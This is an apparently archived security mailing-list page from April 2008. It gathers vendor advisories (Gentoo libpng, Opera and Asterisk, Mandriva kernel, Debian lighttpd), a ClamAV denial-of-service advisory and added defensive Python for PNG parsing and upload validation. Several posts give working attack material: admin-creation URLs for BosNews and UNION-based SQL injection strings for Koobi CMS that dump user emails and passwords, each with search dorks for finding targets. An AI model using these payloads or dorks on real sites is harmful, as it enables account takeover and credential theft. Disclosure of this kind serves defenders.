Troopers08 Security Conference, April 23/24 (Munich/Germany)

2008-04-15 Thread Enno Rey
Troopers08 Presentations


Keynote on Invulnerable Software - Dan Bernstein

KIDS - Kernel Intrusion Detection System - Rodrigo Branco

State of Security - Andrew Cushman, Microsoft

Release of the next revision of the free Exploit-Me series of application 
penetration testing tools - Nish Bhalla, Security Compass

Side Channel Analysis - Job de Haas, Riscure

Hackertools according to German law (§ 202c StGB) - Horst Speichert, Lawyer

Hardening Oracle in Corporate Environments - Alexander Kornbrust, 
Red-Database-Security

Virtualization: There is no spoon - Michael Kemp

Straight Talk about Cryptography - Jon Callas, PGP

Evilgrade: You have pending upgrades - Francisco Amato

Self defending networks - hype or essential need for international 
organisations? - Rolf Strehle, VOITH AG

Keynote Virtualization: Floor Wax, Dessert Topping and The End of Information 
Security As We Know It? - Christopher Hoff, Unisys

GPUs, password recovery and thunder tables - Andrey Belenko, ElcomSoft

Incident Management - tasks and organization. - Volker Kozok, German Ministry 
of Defense

A penetration testing learning kit - Ariel Waissbein, Core Security

Organizing and analyzing logdata with entropy - Sergey Bratus, Dartmouth College

The Art of Reversing - Michael Thumann, ERNW GmbH

Enterprise Webapplication Security [EMAIL PROTECTED] S.E., Dr. Johannes Raab, 
Allianz S.E.

Tapping $$$ Enterprises - Pierre Kroma

Virtual Honey Pots - Thorsten Holz, Universitaet Mannheim

SCADA and National Critical Infrastructures: is security an optional? - Raoul 
Chiesa

Data Loss Protection - Hope or Hype? - Enno Rey & Angus Blitter



thanks,

-- 
Enno Rey



ERNW GmbH - Breslauer Str. 28 - 69124 Heidelberg - www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 173 6745902
PGP FP 055F B3F3 FE9D 71DD C0D5  444E C611 033E 3296 1CC1

Handelsregister Heidelberg: HRB 7135
Geschaeftsfuehrer: Roland Fiege, Enno Rey


[ GLSA 200804-15 ] libpng: Execution of arbitrary code

2008-04-15 Thread Robert Buchholz
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200804-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: libpng: Execution of arbitrary code
  Date: April 15, 2008
  Bugs: #217047
ID: 200804-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability in libpng may allow for execution of arbitrary code in
certain applications that handle untrusted images.

Background
==========

libpng is a free ANSI C library used to process and manipulate PNG
images.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  media-libs/libpng      < 1.2.26-r1                    >= 1.2.26-r1

Description
===========

Tavis Ormandy of the Google Security Team discovered that libpng does
not handle zero-length unknown chunks in PNG files correctly, which
might lead to memory corruption in applications that call
png_set_read_user_chunk_fn() or png_set_keep_unknown_chunks().

Impact
======

A remote attacker could entice a user or automated system to process a
specially crafted PNG image in an application using libpng and possibly
execute arbitrary code with the privileges of the user running the
application. Note that processing of unknown chunks is disabled by
default in most PNG applications, but some such as ImageMagick are
affected.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All libpng users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/libpng-1.2.26-r1"

References
==========

  [ 1 ] CVE-2008-1382
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1382

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200804-15.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


signature.asc
Description: This is a digitally signed message part.
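
The following Python is an added example, not code from the advisory, from Gentoo or from libpng. It walks a PNG chunk by chunk with the checks a reader needs (declared length against remaining input, the 31-bit length limit, chunk-type letters, CRC) and shows that a zero-length unknown chunk, the case the advisory is about, needs no special code path as long as the body is sliced from the declared length and nothing is read or allocated beyond it. The sample image and the private chunk type `prVt` are constructed for the example.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
CRITICAL = {b"IHDR", b"PLTE", b"IDAT", b"IEND"}


def make_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one chunk: 4-byte big-endian length, type, data, CRC32(type + data)."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def parse_chunks(png: bytes):
    """Walk every chunk up to IEND, validating as a hardened reader should.

    Returns a list of (type, data) pairs and raises ValueError on malformed
    input. A zero-length chunk, known or unknown, yields data == b"": the
    slice is taken from the declared length, so nothing is ever read or
    allocated beyond it and there is no separate "empty body" code path.
    """
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("bad PNG signature")
    pos = len(PNG_SIGNATURE)
    chunks = []
    while True:
        if len(png) - pos < 12:                     # length + type + crc
            raise ValueError("truncated chunk header")
        (length,) = struct.unpack_from(">I", png, pos)
        ctype = png[pos + 4:pos + 8]
        if length > 0x7FFFFFFF:                     # spec: length < 2^31
            raise ValueError("chunk length exceeds 2^31-1")
        if len(png) - (pos + 8) < length + 4:
            raise ValueError("chunk body runs past end of input")
        if not all(65 <= b <= 90 or 97 <= b <= 122 for b in ctype):
            raise ValueError("chunk type is not four ASCII letters")
        data = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack_from(">I", png, pos + 8 + length)
        if crc != (zlib.crc32(ctype + data) & 0xFFFFFFFF):
            raise ValueError("CRC mismatch in chunk %r" % ctype)
        chunks.append((ctype, data))
        pos += 12 + length
        if ctype == b"IEND":
            return chunks


def unknown_chunks(png: bytes):
    """What a keep-unknown-chunks / user-chunk callback would be handed."""
    return [(t, d) for t, d in parse_chunks(png) if t not in CRITICAL]


def is_well_formed(png: bytes) -> bool:
    try:
        parse_chunks(png)
        return True
    except ValueError:
        return False


# Constructed sample: a 1x1 RGB image carrying a zero-length private ancillary
# chunk. "prVt" is made up for this example (lower-case first letter =
# ancillary, lower-case second letter = private, upper-case third = reserved).
IHDR = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit depth, RGB
IDAT = zlib.compress(b"\x00\xff\x00\x00")              # filter 0 + one red pixel
SAMPLE_PNG = (PNG_SIGNATURE
              + make_chunk(b"IHDR", IHDR)
              + make_chunk(b"prVt", b"")
              + make_chunk(b"IDAT", IDAT)
              + make_chunk(b"IEND", b""))

if __name__ == "__main__":
    for ctype, data in parse_chunks(SAMPLE_PNG):
        print(ctype.decode("ascii"), len(data))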


[ GLSA 200804-14 ] Opera: Multiple vulnerabilities

2008-04-15 Thread Robert Buchholz
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200804-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Opera: Multiple vulnerabilities
  Date: April 14, 2008
  Bugs: #216022
ID: 200804-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been discovered in Opera, allowing for
execution of arbitrary code.

Background
==========

Opera is a fast web browser that is available free of charge.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  www-client/opera           < 9.27                          >= 9.27

Description
===========

Michal Zalewski reported two vulnerabilities, memory corruption when
adding news feed sources from a website (CVE-2008-1761) as well as when
processing HTML CANVAS elements to use scaled images (CVE-2008-1762).
Additionally, an unspecified weakness related to keyboard handling of
password inputs has been reported (CVE-2008-1764).

Impact
======

A remote attacker could entice a user to visit a specially crafted web
site or news feed and possibly execute arbitrary code with the
privileges of the user running Opera.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Opera users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/opera-9.27"

References
==========

  [ 1 ] CVE-2008-1761
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1761
  [ 2 ] CVE-2008-1762
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1762
  [ 3 ] CVE-2008-1764
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1764

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200804-14.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


signature.asc
Description: This is a digitally signed message part.


[ GLSA 200804-13 ] Asterisk: Multiple vulnerabilities

2008-04-15 Thread Robert Buchholz
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200804-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Asterisk: Multiple vulnerabilities
  Date: April 14, 2008
  Bugs: #200792, #202733, #213883
ID: 200804-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been found in Asterisk allowing for SQL
injection, session hijacking and unauthorized usage.

Background
==========

Asterisk is an open source telephony engine and tool kit.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  net-misc/asterisk          < 1.2.27                       >= 1.2.27

Description
===========

Asterisk upstream developers reported multiple vulnerabilities:

* The Call Detail Record Postgres logging engine (cdr_pgsql) does not
  correctly escape the ANI and DNIS arguments before using them in SQL
  statements (CVE-2007-6170).

* When using database-based registrations (realtime) and host-based
  authentication, Asterisk does not check the IP address when the
  username is correct and there is no password provided
  (CVE-2007-6430).

* The SIP channel driver does not correctly determine if
  authentication is required (CVE-2008-1332).

Impact
======

Remote authenticated attackers could send specially crafted data to
Asterisk to execute arbitrary SQL commands and compromise the
administrative database. Remote unauthenticated attackers could bypass
authentication using a valid username to hijack other users' sessions,
and establish sessions on the SIP channel without authentication.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Asterisk users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/asterisk-1.2.27"

References
==========

  [ 1 ] CVE-2007-6170
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6170
  [ 2 ] CVE-2007-6430
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6430
  [ 3 ] CVE-2008-1332
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1332

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200804-13.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


signature.asc
Description: This is a digitally signed message part.


Dotclear 'ecrire/images.php' Arbitrary File Upload Vulnerability

2008-04-15 Thread Morgan ARMAND

#

Advisory #1 Dotclear 'ecrire/images.php' Arbitrary File Upload 
Vulnerability


$ Author : Morgan ARMAND
$ Contact : armand_m at epitech dot net
$ Vendor URL : http://www.dotclear.net
$ Vendor Contacted : 07/04/2008
$ Vendor Status : No response
$ Affected Software : Dotclear <= 1.2.7.1
$ Severity : Medium / Critical

#

Vulnerability:

Dotclear is prone to an arbitrary script upload vulnerability.

The vulnerability is caused by missing validation of the file extension.

If successfully exploited, an attacker can execute arbitrary script code
on a vulnerable server.

You need to have an account in order to access the vulnerable page.

All versions of Dotclear are considered vulnerable at the moment.
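
As an added example (not Dotclear code and not part of the advisory), the following Python shows the validation an image-upload handler such as `ecrire/images.php` is missing: the stored name is reduced to a single, allow-listed extension and the content must carry the matching magic bytes. The allowlist and the sample inputs are constructed for the example.

```python
import os
import posixpath
from typing import Optional

# Allowlist for an image-upload endpoint: the extension the stored file may
# carry and the magic bytes its content must start with. Both checks matter:
# the name decides how the web server will dispatch the file later, the
# content rules out a script renamed to look like an image.
ALLOWED = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def safe_image_name(filename: str, content: bytes) -> Optional[str]:
    """Return the name to store the upload under, or None to reject it."""
    # Drop any directory part the client supplied, whichever separator it used.
    base = posixpath.basename(filename.replace("\\", "/"))
    if base in ("", ".", "..") or "\x00" in base:
        return None
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED:
        return None
    # A dotted stem ("shell.php.jpg") is refused outright: some servers pick
    # the handler from an inner extension, so the conservative rule is to
    # allow exactly one extension.
    if "." in stem:
        return None
    if not any(content.startswith(magic) for magic in ALLOWED[ext]):
        return None
    return stem + ext
```

Dotfiles are rejected as a side effect of the single-extension rule: `os.path.splitext(".htaccess")` yields no extension, so a rewrite of the upload directory's server configuration is refused along with scripts.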




BosNews v4.0 Remote add user admin

2008-04-15 Thread houssamix
--

- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo 
-

--


= Author : HouSSaMix  

= Script : BosNews

= version : 4.0

= Download : http://www.bosdev.com/


= Dork : Powered by BosNews


   

= BUG  :  Remote add user admin


exploit = Target.com/path/newsadmin.php?action=create_account


Here you can add a new admin user.


= admin login 


Target.com/path/newsadmin.php



clamav: Endless loop / hang with crafted arj, CVE-2008-1387

2008-04-15 Thread Hanno Böck
Advisory published at:
http://int21.de/cve/CVE-2008-1387-clamav.html

clamav: Endless loop / hang with crafted arj, CVE-2008-1387

References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1387
http://svn.clamav.net/svn/clamav-devel/trunk/ChangeLog
http://www.cert.fi/haavoittuvuudet/joint-advisory-archive-formats.html

Description

CERT-FI published an advisory with a large number of samples of crafted 
archives.
The file with the md5sum b6046d890e6bd304e3756c88b989559a (named 
b6046d890e6bd304e3756c88b989559a.arj) hangs clamav with high load.

If you're running clamav on a mailserver, an attacker can DoS your server
remotely by sending some mails with the archive attached.

Workaround/Fix

clamav 0.93 fixes this issue, besides other security issues; if you're running
clamav you should upgrade as soon as possible.

Disclosure Timeline

2008-03-17 CERT-FI publishes advisory
2008-03-26 Vendor contacted
2008-03-27 Vendor approves issue
2008-04-14 Vendor releases 0.93
2008-04-16 Advisory published

CVE Information

The Common Vulnerabilities and Exposures (CVE) project has assigned the name 
CVE-2008-1387 to this issue. This is a candidate for inclusion in the CVE 
list (http://cve.mitre.org/), which standardizes names for security problems.

Credits and copyright

This vulnerability was discovered by Hanno Boeck of schokokeks.org webhosting. 
It's licensed under the creative commons attribution license.

Hanno Boeck, 2008-04-16, http://www.hboeck.de
-- 
Hanno Böck  Blog:   http://www.hboeck.de/
GPG: 3DBD3B20   Jabber/Mail:[EMAIL PROTECTED]


signature.asc
Description: This is a digitally signed message part.


BosNews 2002-2006 Remote add user admin

2008-04-15 Thread houssamix
--

- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo 
-

--


= Author : HouSSaMix  

= Script : BosNews 

= version : 2002-2006

= Download : http://www.bosdev.com/


= Dork : Powered by BosNews Copyright 2002-2006


   

= BUG  :  Remote add user admin


exploit = Target.com/path/admin/index.php?action=create 


Here you can add a new admin user.


= admin login 


Target.com/path/admin/index.php


Re: Secunia Research: Lotus Notes Folio Flat File Parsing Buffer Overflows

2008-04-15 Thread Luigi Auriemma
 Autonomy Keyview Folio Flat File Parsing Buffer Overflows
 Autonomy Keyview Applix Graphics Parsing Vulnerabilities
 Autonomy Keyview EML Reader Buffer Overflows
 activePDF DocConverter Folio Flat File Parsing Buffer Overflows
 activePDF DocConverter Applix Graphics Parsing Vulnerabilities 
 Lotus Notes Applix Graphics Parsing Vulnerabilities
 Lotus Notes Folio Flat File Parsing Buffer Overflows
 Lotus Notes EML Reader Buffer Overflows
 Lotus Notes kvdocve.dll Path Processing Buffer Overflow
 Lotus Notes htmsr.dll Buffer Overflows
 Symantec Mail Security Folio Flat File Parsing Buffer Overflows
 Symantec Mail Security Applix Graphics Parsing Vulnerabilities

12 mails for the same library?

From what I have understood all the bugs are just in this Autonomy
Keyview library so in my opinion reporting the same identical bugs in
each software which uses this third-party component and additionally
without saying that the problem in reality is in the library is wrong
and leads to a lot of confusion.

It's just like if someone finds a bug in zlib and releases 1
advisories, one for each program in the world which uses the library...
the bug is not in these 1 programs but only in zlib.


--- 
Luigi Auriemma
http://aluigi.org


[ MDVSA-2008:086 ] - Updated kernel packages fix vulnerability

2008-04-15 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:086
 http://www.mandriva.com/security/
 ___
 
 Package : kernel
 Date: April 15, 2008
 Affected: Corporate 4.0
 ___
 
 Problem Description:
 
 The isdn_ioctl function in isdn_common.c in the Linux kernel prior to
 2.6.23 allows local users to cause a denial of service via a crafted
 ioctl struct in which iocts is not null terminated, which triggers a
 buffer overflow (CVE-2007-6151).
 
 The do_coredump function in fs/exec.c in the Linux kernel prior to
 2.6.24-rc3 did not change the UID of a core dump file if it exists
 before a root process creates a core dump in the same location, which
 could possibly allow local users to obtain sensitive information
 (CVE-2007-6206).
 
 The shmem_getpage function in mm/shmem.c in the Linux kernel versions
 2.6.11 through 2.6.23 did not properly clear allocated memory in
 certain rare circumstances related to tmpfs, which could possibly
 allow local users to read sensitive kernel data or cause a crash
 (CVE-2007-6417).
 
 Additionally, this kernel provides a fix for megaraid_sas and updates
 it to version 3.13, updates mptsas to version 3.12.19, and updates
 e1000-ng to version 7.6.12, as well as adds igb version 1.0.8.
 
 To update your kernel, please follow the directions located at:
 
   http://www.mandriva.com/en/security/kernelupdate
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6151
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6206
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6417
 ___
 
 Updated Packages:
 
 Corporate 4.0:
 4ecd928352ae1a0e37af030841e1daca  
corporate/4.0/i586/kernel-2.6.12.34mdk-1-1mdk.i586.rpm
 e25d7be22e3e194dd1f50409d0e71b90  
corporate/4.0/i586/kernel-BOOT-2.6.12.34mdk-1-1mdk.i586.rpm
 e42a62385fd608bf8d9b3ec62d6684e8  
corporate/4.0/i586/kernel-doc-2.6.12.34mdk-1-1mdk.i586.rpm
 0522dc2efc14a6fb456bed196e5ef87e  
corporate/4.0/i586/kernel-i586-up-1GB-2.6.12.34mdk-1-1mdk.i586.rpm
 723df91e8a94e9e4654a30875fe9de94  
corporate/4.0/i586/kernel-i686-up-4GB-2.6.12.34mdk-1-1mdk.i586.rpm
 b276ba8700f7e611bfdf02b3b26c4796  
corporate/4.0/i586/kernel-smp-2.6.12.34mdk-1-1mdk.i586.rpm
 0a369c5c6e085596c2fa579074e0eed0  
corporate/4.0/i586/kernel-source-2.6.12.34mdk-1-1mdk.i586.rpm
 53e34bb761dbf927ec911248aee1f23b  
corporate/4.0/i586/kernel-source-stripped-2.6.12.34mdk-1-1mdk.i586.rpm
 c10f59cf9d289f0e9e8cdeb4e7fb3f0e  
corporate/4.0/i586/kernel-xbox-2.6.12.34mdk-1-1mdk.i586.rpm
 90a86dd0e5fb9d62edd9682f5a86f978  
corporate/4.0/i586/kernel-xen0-2.6.12.34mdk-1-1mdk.i586.rpm
 af3beaab8bf06f0beef21158e5d6878e  
corporate/4.0/i586/kernel-xenU-2.6.12.34mdk-1-1mdk.i586.rpm 
 5137cdde7b33a50562d783ee93bfa608  
corporate/4.0/SRPMS/kernel-2.6.12.34mdk-1-1mdk.src.rpm

 Corporate 4.0/X86_64:
 371f8a2b038bbe058dea1666b3b186da  
corporate/4.0/x86_64/kernel-2.6.12.34mdk-1-1mdk.x86_64.rpm
 c7c9bfe79048fb2f94ca600ddd2da911  
corporate/4.0/x86_64/kernel-BOOT-2.6.12.34mdk-1-1mdk.x86_64.rpm
 a27a0da5b9e28ce0193a83a75e6e73c8  
corporate/4.0/x86_64/kernel-doc-2.6.12.34mdk-1-1mdk.x86_64.rpm
 7615a2c0aee3363886f159f4bfc5f538  
corporate/4.0/x86_64/kernel-smp-2.6.12.34mdk-1-1mdk.x86_64.rpm
 0e896d19f066f836fcfb7dd470522d0c  
corporate/4.0/x86_64/kernel-source-2.6.12.34mdk-1-1mdk.x86_64.rpm
 b09194d6e8a07b1ae836be6335808464  
corporate/4.0/x86_64/kernel-source-stripped-2.6.12.34mdk-1-1mdk.x86_64.rpm
 6845355d4579b2f2933935c88567981b  
corporate/4.0/x86_64/kernel-xen0-2.6.12.34mdk-1-1mdk.x86_64.rpm
 f0e8c8777c6da9db4dbea6de1b0fc920  
corporate/4.0/x86_64/kernel-xenU-2.6.12.34mdk-1-1mdk.x86_64.rpm 
 5137cdde7b33a50562d783ee93bfa608  
corporate/4.0/SRPMS/kernel-2.6.12.34mdk-1-1mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com


[SECURITY] [DSA 1540-2] New lighttpd packages fix denial of service

2008-04-15 Thread Steve Kemp
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


- 
Debian Security Advisory DSA-1540-2  [EMAIL PROTECTED]
http://www.debian.org/security/   Steve Kemp
April 15, 2008http://www.debian.org/security/faq
- 

Package: lighttpd
Vulnerability  : DOS
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2008-1531

It was discovered that lighttpd, a fast webserver with minimal memory
footprint, did not correctly handle SSL errors.  This could allow
a remote attacker to disconnect all active SSL connections.

This security update fixes a regression in the previous one, which caused
SSL failures.

For the stable distribution (etch), this problem has been fixed in version
1.4.13-4etch8.

We recommend that you upgrade your lighttpd package.


Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Source archives:

  
http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch8.diff.gz
Size/MD5 checksum:37420 89efdab79fcbac119000a64cab648fcd
  
http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13.orig.tar.gz
Size/MD5 checksum:   793309 3a64323b8482b0e8a6246dbfdb4c39dc
  
http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch8.dsc
Size/MD5 checksum: 1098 87a04c4e704dd7921791bc44407b5e0e

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-doc_1.4.13-4etch8_all.deb
Size/MD5 checksum:99618 ae68b64b7c0df0f0b3a9d19b87e7c40a

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch8_amd64.deb
Size/MD5 checksum:   297300 19f5b871d2a9a483e1ecdaa2325c45cb
  
http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch8_amd64.deb
Size/MD5 checksum:63586 750cf5f5d7671986b195366f2335c9cc
  
http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch8_amd64.deb
Size/MD5 checksum:63884 72ee2b52772010ae7c63a0a2b4761ff5
  
http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch8_amd64.deb
Size/MD5 checksum:59138 45672a1a3af65311693a3aee58be5566
  
http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch8_amd64.deb
Size/MD5 checksum:69890 b84d4ea8c9af282e2aeeb5c05847a95a
  
http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch8_amd64.deb
Size/MD5 checksum:60742 f48ef372b71be1b2683d03b411c7e7cf

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch8_hppa.deb
Size/MD5 checksum:59896 60a4e61e9b5e2bafbf53474d677b36bb
  
http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch8_hppa.deb
Size/MD5 checksum:   323946 642f46921f99dfdf8e52ed3777847cbc
  
http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch8_hppa.deb
Size/MD5 checksum:61890 4feb260d9f611c26979872b49b09ebc1
  
http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch8_hppa.deb
Size/MD5 checksum:65000 2ce28ddd20bcd1bf407e14bae053537b
  
http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch8_hppa.deb
Size/MD5 checksum:72946 33c93c114c3807d63bb18a5a9b3f33b9
  
http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch8_hppa.deb
Size/MD5 checksum:65520 82a4460351af3d4c8b9d84ec831bd006

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch8_i386.deb
Size/MD5 checksum:63884 96876134f02cf6b3c5079d5deecca7d9
  
http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch8_i386.deb
Size/MD5 checksum:59086 f928fd96f37229e72661fa7140a0daa9
  
http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch8_i386.deb
Size/MD5 checksum:   289088 477ce333d4a1b9f506645ff22193191f
  
http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch8_i386.deb
Size/MD5 checksum:70932 90cd2be30fb0f0e0ff97820e1b8c19f1
  

Koobi CMS 4.2.4/4.2.5/4.3.0 Multiple Remote SQL Injection Vulnerabilities

2008-04-15 Thread sys-project
--==+=== Spanish Hackers Team (www.spanish-hackers.com) 
=+==--

--==+ Koobi CMS 4.3.0, 4.2.5, 4.2.4 Multiple Remote SQL Injection   
 +==--

--==++==--

 [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]


[+] Info:


[~] Software: Koobi CMS 4.3.0, 4.2.5, 4.2.4

[~] HomePage: http://www.dream4.de/

[~] Exploit: Remote SQL Injection [High]

[~] Where: index.php

[~] Bug Found By: JosS

[~] Contact: sys-project[at]hotmail.com

[~] Web: http://www.spanish-hackers.com


[+] Dorks:


[~] Koobi CMS 4.3.0: powered by koobi-cms 4.3.0

[~] Koobi CMS 4.2.5: powered by koobi-cms 4.2.5

[~] Koobi CMS 4.2.4: powered by koobi-cms 4.2.4


[+] Exploits for 4.3.0:


[~] Module: gallery

[~] /index.php?area=1&p=gallery&action=showimages&galid=[SQL]

[~] Admin Data: 
-104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/*


[~] Module: downloads

[~] /index.php?showfile=1&fid=31&p=downloads&area=1&categ=[SQL]

[~] Admin Data: 
-104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/*


[+] Exploits for 4.2.5:


[~] Module: links

[~] /index.php?showlink=1&fid=1&p=links&area=1&categ=[SQL]

[~] Admin Data: 
-104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/*


[~] Module: downloads

[~] /index.php?showfile=1&fid=1&p=downloads&area=1&categ=[SQL]

[~] Admin Data: 
-104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/*


[+] Exploits for 4.2.4:


[~] Module: downloads

[~] /index.php?showfile=1&fid=31&p=downloads&area=1&categ=[SQL]

[~] Admin Data: 
-104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/*


--==+=== Spanish Hackers Team (www.spanish-hackers.com) 
=+==--

--==+   JosS
 +==--

--==++==--

   [+] [The End]


WordPress 2.5 - Salt cracking vulnerability

2008-04-15 Thread J. Carlos Nieto

WORDPRESS 2.5 - SALT CRACKING VULNERABILITY
